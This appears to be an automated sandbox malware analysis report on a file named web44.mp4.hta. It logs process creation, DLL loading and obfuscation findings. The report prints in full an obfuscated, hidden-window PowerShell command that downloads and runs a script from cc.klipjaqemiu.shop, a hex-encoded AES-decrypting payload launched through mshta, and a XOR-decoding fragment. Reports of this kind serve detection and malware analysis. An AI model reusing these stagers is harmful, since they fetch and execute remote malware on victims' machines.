0146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"
Source: C:\Windows\SysWOW64\mshta.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function koWp($WfBPy){return -split ($WfBPy -replace '..', '0x$& ')};$mBfyr = koWp('9E334B36DA65FC4CD88FD0D54C1C22FBF8DC3B04BEA415EE8D3A4D1484B0406150B7FF1C184327B495DC49163E68AE0670BA32D22B53F3D21DCCDDA39FD3253FED91DE2B3F77E4037B055F4B3412D5CCDC3A1B39789F06F7930DC4A07956FA68ECA8E2F6499D93177D1921AE2418CB2699EC6C80E7279A8ABD6A9A4D7E3FE3E8DBE4570E1F55A43D6D4C508FA56991F95689680AF64B5262A41D3D94C5F57CFA20AEB1A08FF2BF17B5DACB4212C70DAB809FDB5CBE0FB22347AE8AC80DFC19BE9C5BA8E9936657F3587DC5A7C1B93B8B5B8928D6F42DFFA7E01FDF4E34C895C6039AA5AAD3D62F3554CF79FFD5E8D7A01A4EE09AFF55F72C99249D32B683A307373EE57BF7DABB7B643375C84A3675780A53350109BB137CD9B3151E1862197A092A63D6891D60C45B0E08870ACA193A7AE7A69F71D5319D1C5591C30F1EB14BF2E8CAC0C0AA47B1CF263341221208EDD70ADC782580AEF182C6EDE0AC0C8846BA02132CCC59FE2FBA0AF85CC83A92B444E34D299CE4BB78D2E67097531997B9C398AFA59A05087AD10CB8FCCD64B089CB7E1D9448A06E5451B7E1FAD3CD11656CE7D71529FC0AEEEC74A57C9B8ADA400E5BB14D609B2A4D2C9887A949A351792F6DAAD814BCEF8C2537EA18295DBF31BEBE4D1BFA7BBE02DADACCFC47444EB2B533F4A699B7865C05848BB784791ABDBA2F36A897BE319943B5C85F80D1B9901F0FFC37613068553B99EE84836A56CB1F70957317E3A43F3D9EBBBE18FEEEE52CE041029AB9AE45A4C86F910A6DDF5765B4BDB03CB85481DDC8C8212A1F1F92B468BE8CB5336E24ED88C9EC8A01CD4F72DE404497DBB43A1C6A3822034F15F5F613EF5AD780B9692707BAB44FB088A6061592C44B022A6D2A450C99C283117C8DE80E765C31E70308152E59458E6FD3A65543C1EC931AC1A324732F6D1FAAC4ABD5F572332947D1CB4967831073016E5EFAEF616F9317B004A73FFFA3BB2982E91CBDEC269FEF3EF96395F94BE96D5496BDF35E25A6638E2E25097DB07C73C3EDD7402BED8FC500882DA3AAFFC8D06FD1BDDE8708DF8DF844F0DDCECCAA22D16BAB70D3B7D5E264B1AE1584137DD7BDA7005C6F39D6C9271A903BB3663E0EDF514BF4A8D05593DB9B5DDFC4556BAC017AE2DE8428EA44A76D6E9AFC522C9004ED9C593141666A52943AD448960D2C7623E6C4AF33F5BAD89705B716C876AE63E40D381B88EBEEB6363614481CFB2012ACABC9C09E6D61B30149F2E4FA7380A70464224BEC1ABE9475DBD5B97FCF0278165F21FB815FF60146030497A1AC45D69CA7553003C733F00F0973A5FD787F2E4DEC6F22A0BD2B2F6F882AFAFCFC5C903FB6AAEDD7F994E291239B6B7D06CF6DF234FB061934125997FFAC95D4511365A41A1A1A2B19410ABB92EE5511D9ACB16ADBBCFE5B0C2A4CF6C8B8CD6F6E0E9FDF7232373370C3CB4477D9D543073DAF28D5809AD15346E15E3E789993EF8D9B807067BF4F550783802415488F744831F04FEEF6925ABC1B6B107B1002FF450B386D584C659F07EB9483654CA1F5116547B9383D4F85CD91CE2D9F6088D2CE491512578016E54A41FAE48B2708F2AB1FA5C98F21304571169F6900A36E6AB306ADB4533F862332FE99DCA4CC3C773200966C0661E34A4320C65CF06429FCF2C90F24ECE6ED646948A6B8CCC0B81784FAFFC3007767BBC247C0A4FD247054540D44A8F8F303C529528C742475550E80FF0A5CE818CF6A23675E50F990211BE6A6DC6D729CC913740AEE1A9CDE15B4F8D33D82CA43B137E9B62F21E5FC4638A978553BEC16E68B51442628A7B1B7CD74D29750EEA98B02DCE0DC70288EAA41730BDD489C393E565891B9E2C52FE9E6A9704F6FF74B93ABF9307EA0D851BCDF290E0A8461D19516ABB02C61C6CBE1E1C259');$AjiG=-join [char[]](([Security.Cryptography.Aes	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWow64\WindowsPowerShell\v1.0\powershell.exe" -w hidden -ep bypass -nop -Command gdr -;Set-Variable CiU (.$ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name)\|Member\|Where-Object{$_.Name-like'tomd'}).Name).Invoke($ExecutionContext.(($ExecutionContext\|Member)[6].Name).(($ExecutionContext.(($ExecutionContext\|Member)[6].Name).PsObject.Methods\|Where-Object{$_.Name-like'ome'}).Name).Invoke('N-O',$TRUE,$TRUE),[Management.Automation.CommandTypes]::Cmdlet)Net.WebClient);Set-Item Variable:/lW 'https://cc.klipjaqemiu.shop/web.png';[ScriptBlock]::Create((GI Variable:CiU).Value.((((GI Variable:CiU).Value\|Member)\|Where-Object{$_.Name-like'nlg'}).Name).Invoke((Variable lW).Value)).InvokeReturnAsIs()	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mshtml.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msiso.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: srpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msimtf.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxgi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: resourcepolicyclient.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dataexchange.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d11.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dcomp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: twinapi.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: jscript9.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d2d1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: d3d10warp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: dxcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\mshta.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: web44.mp4.hta

Static file information: File size 1288850 > 1048576

Data Obfuscation

.NET source code contains potential unpacker

Source: 4.2.powershell.exe.82e0000.3.raw.unpack, -.cs	.Net Code: _E001 System.AppDomain.Load(byte[])
Source: 4.2.powershell.exe.82e0000.3.raw.unpack, -.cs	.Net Code: _E009 System.Reflection.Assembly.Load(byte[])

Found suspicious powershell code related to unpacking or dynamic code loading

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Anti Malware Scan Interface: FromBase64String($z));$byteString = $enc.GetBytes($string);$xordData = $(for ($i = 0; $i -lt $byteString.length; ) {for ($j = 0; $j -lt $xorkey.length; $j++) {$byteString[$i] -bxor $xorkey[$j];$i++;if

Suspicious powershell command line found

